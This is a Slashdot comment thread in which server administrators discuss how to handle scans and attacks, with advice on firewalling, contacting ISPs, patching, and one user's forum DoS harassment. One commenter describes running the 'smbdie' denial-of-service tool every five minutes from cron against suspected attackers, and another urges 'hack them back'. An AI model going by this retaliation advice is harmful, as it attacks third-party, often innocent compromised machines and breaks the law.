Personally I also try giving them a taste of their own medicine. You'd be surprised how many Windows machines are still vulnerable to the old 'smbdie'. I set up a cron job to 'smbdie' all hackers / spammers etc every 5 minutes. But of course this is horrible advise because ( and I'm sure everyone will respond and tell you that it's very naughty to fight fire with fire, and you will most likely go blind or some bullshit. )

So yeah. Firewall them. And if you've got time, email their ISP and tell them that you've firewalled them and if you have any complaints from customers about them not being able to access your sever, that you will advise them that their ISP is harbouring hackers and that they should switch ISPs.

Hack them back! (4, Funny)

Numen (244707) | about 10 years ago | (#9956579)

Whatever they're doing to you have a go back at them... chances are their system isn't as secure as yours.

At the very least it's more fun than writting an e-mail!

Contact the ISP... (1)

zxflash (773348) | about 10 years ago | (#9956589)

The word liability will freak out any small ISP enough to contact the "user" and give them a stern warning... I don't know if you'd have any luck with one of the big boys (AOL, Earthlink...)

normal for this time of year (5, Funny)

phek (791955) | about 10 years ago | (#9956596)

It's really normal to notice a huge increase in attacks this time of year. With the passing of defcon and black hat this month, a lot of new security vunerabilities have been released, and all of the 'script kiddies' are eager to try them out. The best thing to do is make sure all your software is up to date, and get familiar with the new vunerabilities that are out so you can protect yourself.

As far as reporting them, you could try all day and not be able to report all of them, and even if you did, they're most likely attacking from someone else's vunerable machine. The only thing you can really do is watch out for anyone who's aggressivly attacking you (i.e. one person who's running lots of attacks on you trying desperately to break into your machine at any cost), and report those ones, or if you can find a way to contact that person, tell them to stop before you report them to their isp and/or authorities, this will usually scare most people off.

Once you do start paying some decent attention to security releases, a lot of these stupid things people try won't surprise you, like the ssh root attempt is because some tool came out recently that just scans netblocks for anyone running ssh and try's logging in as two different users with no password, root being one of them. If your not familiar with where to find security releases, here's some good places to start:

packetstorm security [packetstormsecurity.org]
Security Focus [securityfocus.com]

Somewhat offtopic, but how do people deal with DOS (5, Interesting)

bretharder (771353) | about 10 years ago | (#9956597)

Somewhat offtopic, but how do people deal with DOS attacks?
I've had a person harrasing the forums at a website that I host.
I banned by IP and then he started using proxys,
so I had to write a script to ban his IP each time he logged in,
of course then he started creating new accounts;
so I had to change the forum registration to one account per unique email address.
And then he tried to DOS the site by visiting the site and locking down his F5 key.
(He accually confessed this to me in IRC; he had 4 other people do this with him.)
I sent Comcast (his isp) the IRC logs & the network monitor logs.
They sent me a generic response saying "blah blah blah.. this is an automated response".
And thats it.
So how do other /.ers deal with situations like this?
It's a personal website, and I don't have the funds to hire a lawyer.
I've banned his IP and ~6000 proxy IPs, but he still keeps getting through.

Re:Somewhat offtopic, but how do people deal with (1)

phek (791955) | about 10 years ago | (#9956612)

well step #1 would be get your site on a server with enough bandwidth so that a few people holding down refresh key isn't going to DOS your site.

Re:Somewhat offtopic, but how do people deal with (1)

bretharder (771353) | about 10 years ago | (#9956627)

So basically I should give into the f*ckwad and fork over more cash for more bandwidth on a site that -under normal circumstances- doesn't require much bandwidth?

This thread explains your problem ! (0)

Anonymous Coward | about 10 years ago | (#9956629)

This thread explains your problem :

http://www.dslreports.com/forum/remark,10854834~ mo de=flat~days=9999
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>